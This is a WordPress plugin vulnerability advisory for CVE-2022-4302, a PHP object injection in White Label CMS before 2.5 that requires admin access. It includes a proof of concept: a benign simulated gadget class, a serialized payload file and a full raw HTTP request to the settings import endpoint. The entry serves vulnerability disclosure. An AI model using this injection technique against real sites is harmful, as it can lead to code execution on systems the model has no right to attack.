WordPress Plugin Vulnerabilities

White Label CMS < 2.5 - Admin+ PHP Object Injection

Description

The plugin unserializes user input provided via the settings, which could allow high-privilege users such as admin to perform PHP Object Injection when a suitable gadget is present.

Proof of Concept

To simulate a gadget chain, put the following code in a plugin:

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then create a file named "import.txt" with the following content: O:4:"Evil":0:{};

And import the file via the "Import Settings" feature in Settings > White Label CMS (requires the White Label CMS plugin to be active).

The view the response of the import request made, which will have the "Arbitrary deserialization" message

POST /wp-admin/options-general.php?page=wlcms-plugin.php&view=settings HTTP/1.1
Host: localhost:8888
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8888/wp-admin/options-general.php?page=wlcms-plugin.php
Content-Type: multipart/form-data; boundary=---------------------------3253008022193750493240374932
Content-Length: 669
Origin: http://localhost:8888
Connection: close
Cookie: [admin+]
Upgrade-Insecure-Requests: 1

-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings_nonce"

d8d0333b92
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/options-general.php?page=wlcms-plugin.php
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="wlcms-settings"

Save
-----------------------------3253008022193750493240374932
Content-Disposition: form-data; name="import_file"; filename="import.txt"
Content-Type: text/plain

O:4:"Evil":0:{};

-----------------------------3253008022193750493240374932--

Affects Plugins

Plugin icon
white-label-cms
Fixed in 2.5

References

CVE
CVE-2022-4302

Classification

Type
OBJECT INJECTION
OWASP top 10
A8: Insecure Deserialization
CWE
CWE-502
CVSS
3.3 (low)

Miscellaneous

Original Researcher
Nguyen Duy Quoc Khanh
Submitter
Nguyen Duy Quoc Khanh
Submitter twitter
ndqkhanh
Verified
Yes
WPVDB ID
b7707a15-0987-4051-a8ac-7be2424bcb01

Timeline

Publicly Published
2022-12-08 (about 1 years ago)
Added
2022-12-08 (about 1 years ago)
Last Updated
2023-09-20 (about 7 months ago)

Other

Published
Title
Published
2017-10-02
Title
Appointments <= 2.2.1 - Unauthenticated PHP Object Injection
Published
2024-03-05
Title
Logo Showcase Ultimate – Logo Carousel, Logo Slider & Logo Grid < 1.3.9 - Authenticated(Contributor+) PHP Object Injection
Published
2021-08-02
Title
Bold Page Builder < 3.1.6 - PHP Object Injection
Published
2023-09-14
Title
ShortPixel Image Optimizer < 5.4.2 - Authenticated(Editor+) PHP Object Injection
Published
2023-12-29
Title
ARI Stream Quiz < 1.3.1 - Authenticated (Contributor+) PHP Object Injection